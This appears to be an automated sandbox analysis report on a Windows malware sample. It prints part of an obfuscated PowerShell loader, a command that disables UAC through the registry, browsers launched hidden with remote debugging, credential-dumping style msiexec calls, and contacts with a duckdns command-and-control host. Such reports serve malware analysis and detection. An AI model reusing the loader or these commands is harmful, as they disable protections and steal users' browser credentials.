krBAchyaOptis orsI HanN ApaF veruWiriL Bes= .ub(D,ggTRet eTireSHypeTUncr-TiggpfayaaUnmetSu ehSeri Nu,e$StudDultrERe iTfe ka IriCKronH UdfeCarrm krbERa,eNG.let CytE ModRAfstnLympEBet,)Hu d ');while (!$basinful) {Midtpunktsgendes (Galliumoxidernes 'Pas,$ungug PaalAfs.o Neobc,rra SpalUdes:Tap UOkk,nLar p ShouSpejm ljdpRes a S abSupel Op ePyr =Ultr$,rvetTuskr Z nu Un e nds ') ;Midtpunktsgendes $sportsbegivenheden;Midtpunktsgendes (Galliumoxidernes 'Mo is Dd,tSeroaSygerOvisTInda-NudiSCatslHymne InfeforepRekr Samm4Idee ');Midtpunktsgendes (Galliumoxidernes 'Frst$ ecoGOpkoLPiluOStomBMispaClarLDiff:ProsBuddya xplS indI HavnUn eFUd iuSynbl Fle=.nas(occuT LedEsp rSAf bTKvin-Pantp ManAStbetErn H ugt Vesi$AssidNatue ekt SlyA UndC VithBehaE SemMDagsE P,eNMellTtab EViklRFe sNO.seeMism)C.oi ') ;Midtpunktsgendes (Galliumoxidernes 'Scha$ SugGA pilDagsOHedgbAboraSk lLInel: vrebG,teOJohal LabdBir bEmbra ilnNJaroeKrafRNoni=In c$Tr sG riplBandoTredBScruAStoplBe r: Leug,aftrDil aS.kbVDec HH ppuEdwanUtild Ba eSnoonCoinE brdsIndl+Comp+Knsd%Pneu$Extrt ilaYse ev RstsSkivTSmutj MonaS.anA.addlUha E ForTS gn. 
Magc andOSeveUHierN nyoTMuck ') ;$Amorists=$Tyvstjaalet[$Boldbaner]}$Dinornithiformes=335350;$Udskrivninger=30943;Midtpunktsgendes (Galliumoxidernes 'Bari$CalcgAnkrl OpfoAfpaBRamma To.lIn t: PloMForhI.iptnMeriDmarys WomT TekEEqu,LGougNDkfaSFryt Fjer=Kode UopsGBam E .ngtGeor- DevCMaaloBerbN ilktStifEOffrN Bint Arc Unif$ThawdPrefER tutEli,A MotcKkkeh MilERecimkrabE razNGlantPatrEElfor Blonaduse ele ');Midtpunktsgendes (Galliumoxidernes 'Maan$ .reg raul M soFanabbarlaanthl mai: ReaBPahoyHensrAminoHeadn emiWeapsAntit Mu 1lgpl8Fina Ek p=Bass Slaf[nowtSFanty Consp ratLeroe Form Fr .Dro COrdnoSammnDi.avPredeGh srMasst ubp]Dity:Form:ProkFL.evrPocho.fskmSp jBK elaGunysRet eHjae6d ke4Lep SperrtFre.rBe.uiVelsnCo tgMala( ini$Squ.MRecoiuvicnSu gdE itsForotpre ePopkl NonnCra sIne,) Ba, ');Midtpunktsgendes (Galliumoxidernes 'Smre$ HemGwanhLFagjoSystbSl.maStablAl y:Bge RKri I FritDisjeBrnelGr pyDepo1N nm4Si,k3Sava Angs=En g Kons[BlomSFlouYSi.uS pret alaESaufm An,.P lsTFurnE icxf ekT ogr.Rov E laaN G ucSkavoKi kd erpi UninCorvGMagn]Beto: Lis:HeteaefteSBrydcSammiEgn iSeks.ForeGUdvie MarTD.meSB llt,nderuninI GstNSkjogKre (Uret$Warkb S,pYDestrTranORappnFeldI Fa S M.ntMono1Glan8 iek)Plas ');Midtpunktsgendes (Galliumoxidernes '.nko$PortgBefrLKloroGad,bPa raattaLZon,:FariA astU Ef tOptae NonnTryktDumaiUskoFAl nIWr tcEn eeDemorRagiEChe,n pr,D ntieOffesTors1 sut0kro 3 pi=Udlo$ fgirFu mICenttaarseT rrL elyHjor1Upcr4 Fyr3K nt.UdmesUds.u D,rB SniSHektt AgtrBackiRefoN BefgDung( Skf$ForedO,erIEspinHvelOHe.erS,renTelei Ud tlimnHHalsi objfKinooFrstRHazaMWaddeC roSDepa,Brsm$ Wo uSovsDSpe.SWitekNstmr naikalfvD chNPlanIscannPhalG Fage ndeR,ont) teg ');Midtpunktsgendes $Autentificerendes103;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files\Google\Chrome\Application\Chrome.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe0cf9cc40,0x7ffe0cf9cc4c,0x7ffe0cf9cc58

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ykhtyvi"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ykhtyvi"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\ykhtyvi"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\iemlyftohq"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\lgswzydhvywktu"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,8400893986661080904,10342054773294887911,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1920 /prefetch:2

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2096,i,8400893986661080904,10342054773294887911,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2156 /prefetch:3

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2212,i,8400893986661080904,10342054773294887911,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2392 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,8400893986661080904,10342054773294887911,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3188 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3156,i,8400893986661080904,10342054773294887911,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3320 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4308,i,8400893986661080904,10342054773294887911,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4552 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4708,i,8400893986661080904,10342054773294887911,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4524 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4816,i,8400893986661080904,10342054773294887911,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4824 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffe0c7446f8,0x7ffe0c744708,0x7ffe0c744718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,13222862998998336005,837772617709455761,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,13222862998998336005,837772617709455761,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,13222862998998336005,837772617709455761,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2984 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2068,13222862998998336005,837772617709455761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2068,13222862998998336005,837772617709455761,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2068,13222862998998336005,837772617709455761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2068,13222862998998336005,837772617709455761,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\kqunpdjlgxzyyubqzaztxmihsbp.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 13hindi4pistatukoy4tra.duckdns.org udp
US 154.216.18.79:47392 13hindi4pistatukoy4tra.duckdns.org tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 154.216.18.79:47392 13hindi4pistatukoy4tra.duckdns.org tcp
US 154.216.18.79:47392 13hindi4pistatukoy4tra.duckdns.org tcp
US 154.216.18.79:47392 13hindi4pistatukoy4tra.duckdns.org tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 79.18.216.154.in-addr.arpa udp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 3.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.180.4:443 www.google.com tcp
GB 142.250.180.4:443 www.google.com udp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
GB 172.217.169.74:443 ogads-pa.googleapis.com tcp
GB 216.58.201.110:443 apis.google.com tcp
US 8.8.8.8:53 4.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 74.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
GB 172.217.169.74:443 ogads-pa.googleapis.com udp
N/A 127.0.0.1:9222 tcp
US 8.8.8.8:53 play.google.com udp
GB 172.217.16.238:443 play.google.com tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:9222 tcp
US 8.8.8.8:53 72.209.201.84.in-addr.arpa udp
US 154.216.18.79:47392 13hindi4pistatukoy4tra.duckdns.org tcp
US 154.216.18.79:47392 13hindi4pistatukoy4tra.duckdns.org tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 154.216.18.79:47392 13hindi4pistatukoy4tra.duckdns.org tcp
US 154.216.18.79:47392 13hindi4pistatukoy4tra.duckdns.org tcp

Files

memory/4004-4-0x00007FFE0C4F3000-0x00007FFE0C4F5000-memory.dmp

memory/4004-10-0x0000027D9C150000-0x0000027D9C172000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4gb2xdl0.zli.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4004-15-0x00007FFE0C4F0000-0x00007FFE0CFB1000-memory.dmp

memory/4004-16-0x00007FFE0C4F0000-0x00007FFE0CFB1000-memory.dmp

memory/4004-19-0x00007FFE0C4F3000-0x00007FFE0C4F5000-memory.dmp

memory/4004-20-0x00007FFE0C4F0000-0x00007FFE0CFB1000-memory.dmp

memory/4004-21-0x00007FFE0C4F0000-0x00007FFE0CFB1000-memory.dmp

memory/4004-24-0x00007FFE0C4F0000-0x00007FFE0CFB1000-memory.dmp

memory/1708-25-0x0000000002430000-0x0000000002466000-memory.dmp

memory/1708-26-0x0000000004F10000-0x0000000005538000-memory.dmp

memory/1708-27-0x0000000004E50000-0x0000000004E72000-memory.dmp

memory/1708-28-0x0000000005540000-0x00000000055A6000-memory.dmp

memory/1708-29-0x00000000055B0000-0x0000000005616000-memory.dmp

memory/1708-39-0x00000000056E0000-0x0000000005A34000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 71444def27770d9071039d005d0323b7
SHA1 cef8654e95495786ac9347494f4417819373427e
SHA256 8438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9
SHA512 a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034

memory/1708-41-0x0000000005D20000-0x0000000005D3E000-memory.dmp

memory/1708-42-0x0000000005D70000-0x0000000005DBC000-memory.dmp

memory/1708-43-0x00000000075B0000-0x0000000007C2A000-memory.dmp

memory/1708-44-0x00000000062C0000-0x00000000062DA000-memory.dmp

memory/1708-45-0x0000000006FE0000-0x0000000007076000-memory.dmp

memory/1708-46-0x0000000006F40000-0x0000000006F62000-memory.dmp

memory/1708-47-0x00000000081E0000-0x0000000008784000-memory.dmp

C:\Users\Admin\AppData\Roaming\Khets.Ser

MD5 476d1adecfffa599951a00c40bda69d1
SHA1 ce36e9ef38b1486960013f67fe2aa459ca7c3d3f
SHA256 dc05f59a83dee2cd012c3a9d7e5ee28ba868670bb067495b1554b8c7d1b0dc03
SHA512 7a177ac89b7f54457ae29116be4188255d8977588cb18c377b9f91d20b06774bb17eb996ba199b9c364beb6433b63345c7043e6616526e2eff2d99c0398a72ea

memory/1708-49-0x0000000008790000-0x000000000B51E000-memory.dmp

memory/432-63-0x0000000001000000-0x0000000002254000-memory.dmp

memory/432-72-0x0000000020E40000-0x0000000020E74000-memory.dmp

memory/432-71-0x0000000020E40000-0x0000000020E74000-memory.dmp

memory/432-68-0x0000000020E40000-0x0000000020E74000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

MD5 a72373c195c0a68e17638e0da248e886
SHA1 59ffc5242a67c144b4764e4ed05f5b5da167c7d6
SHA256 61c1bd21c09b4d9a4ac6cd18dcb71b1020c09428f33992fc471892331867236f
SHA512 aca92c3a6f48446cc78352f51a905a61b78a3879be9fdc60a7c1e08f14ef8d1d068c66c33c8ebf6221e3e6902e91705b794b673333306d413460700654649c50

memory/3328-81-0x0000000000400000-0x0000000000478000-memory.dmp

memory/4528-82-0x0000000000400000-0x0000000000462000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

MD5 8fb5b9ba3b303f6c3caed559a563b9fe
SHA1 9697ad8495afb27aacdf5ad7359dd919ce22f0ce
SHA256 b2ae53cd2ededc97e559fee2ec6de52ba7aa615093d1a4ceaa86d53e879c6713
SHA512 30a776a4ca19360216eb8d66819e28001fe552194a12f1b2d3e802f5a8a1eb7a690ea2dd4cfe2c94324817bc683cf487009d925b0c0acf5997394146b9bf4566

memory/4528-90-0x0000000000400000-0x0000000000462000-memory.dmp

memory/3328-87-0x0000000000400000-0x0000000000478000-memory.dmp

memory/3328-85-0x0000000000400000-0x0000000000478000-memory.dmp

memory/1520-84-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1520-83-0x0000000000400000-0x0000000000424000-memory.dmp

\??\pipe\crashpad_2728_MXVBHYQHSCMQFYFF

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

MD5 c17cdcbdc578615d8d9ef76d8d0f168a
SHA1 c5d2700302cb14f6445d1d8859a58af32afa2647
SHA256 da30cd6d191dfc6a5774d2e7f3a1ab6fed11cce78f14071665a7b348969227fa
SHA512 d03af87a83fce8025b3d68c693dcaf8b72946cff2914521acbf5fdcc73d85e2c88785163031aea8ba94a23ed7e14356a345180c967341c8117db57f4b6813ccd

memory/4528-101-0x0000000000400000-0x0000000000462000-memory.dmp

memory/1520-89-0x0000000000400000-0x0000000000424000-memory.dmp

memory/3328-88-0x0000000000400000-0x0000000000478000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_1

MD5 d0d388f3865d0523e451d6ba0be34cc4
SHA1 8571c6a52aacc2747c048e3419e5657b74612995
SHA256 902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b
SHA512 376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Temp\ykhtyvi

MD5 7aca43b2800ceb18b3ed2326532545de
SHA1 d4cf207ef85bd749d59c1cb27a09c167ee21523a
SHA256 3d9f8622d97587fd84d3d0560a50ab38e5f894fe4b5bcaa34279643fdaaeb480
SHA512 0e002e6b8d965c227d9b1aa7c0251619c787ec7717e59667e756e5815e3666a955ea397eb148a1ed6bb7d8045727e4efa656a103f14bc70a03b03f0c91283c2f

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/432-213-0x0000000021860000-0x0000000021879000-memory.dmp

memory/432-212-0x0000000021860000-0x0000000021879000-memory.dmp

memory/432-209-0x0000000021860000-0x0000000021879000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 e2f5d4717e3eafb8de215e3435deae4a
SHA1 1edb0025c7db8ae00e20bdad35429615a5d7d365
SHA256 368c28ae3ff41abc5cab8e75775db13d3fa6bb8a4257c5fa5a35da77eef74fb9
SHA512 86c44ee6bf1b905aabb48b9e7615e6b8c0433f22b5729dcf003aab0932db3efd9dfbdb1e3654f43e7a5a05aa015fa26e5437ecf5964abbb742b9cd11155897a8

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

MD5 9e4e94633b73f4a7680240a0ffd6cd2c
SHA1 e68e02453ce22736169a56fdb59043d33668368f
SHA256 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304
SHA512 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 a890c65af1a525e1d4a63b0ec8d2ae05
SHA1 1aaa0f996ca686d26f88a1527259b97ed504b6ec
SHA256 740af2cbfcb709f25e40761f5309332f1488cb8c070371af89630766e4cd7936
SHA512 17bc47302115628d7940671f550f2cab8fbd8daf6ff91b8c192fb28b8c8fffc460b03be537d1257cdaf987b07d8e04409c41d883e25311c4252ea1903c440709

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

MD5 f9f5d178599dd2d1a9eb18853a4035e1
SHA1 0a3ea5ae4a5e1372ecccd279edd241453fa74d19
SHA256 d503a45ed2232d0ab50dae6354fefb7a2bce587aec55541fe13262ffbaab5f68
SHA512 3e69aaa1c9f3669d087fbd625d68b5ea052a9246cc1665277300517dd4b1187f531eb5d5bdf5a492abdd24d2333d3b8565b1831aafad471a138d1129e096ca10

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 c9745625dbd5f0bb251d752db1443a7f
SHA1 0aef110c8c9bea054702192718b883e8d917d02f
SHA256 f94f32b9046eabb2dde29989504b4c5911ff3a36f45a9c8faf0b204e9778506c
SHA512 a7d8c9dd6c5174cfb527720da4cce2105f290e4ef18f5cdb6aaab1446a5b1b241abaedee581ef7f972edb9511fc04b3494791791b2f587a024327417e4ab4c5a

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Favicons

MD5 b40e1be3d7543b6678720c3aeaf3dec3
SHA1 7758593d371b07423ba7cb84f99ebe3416624f56
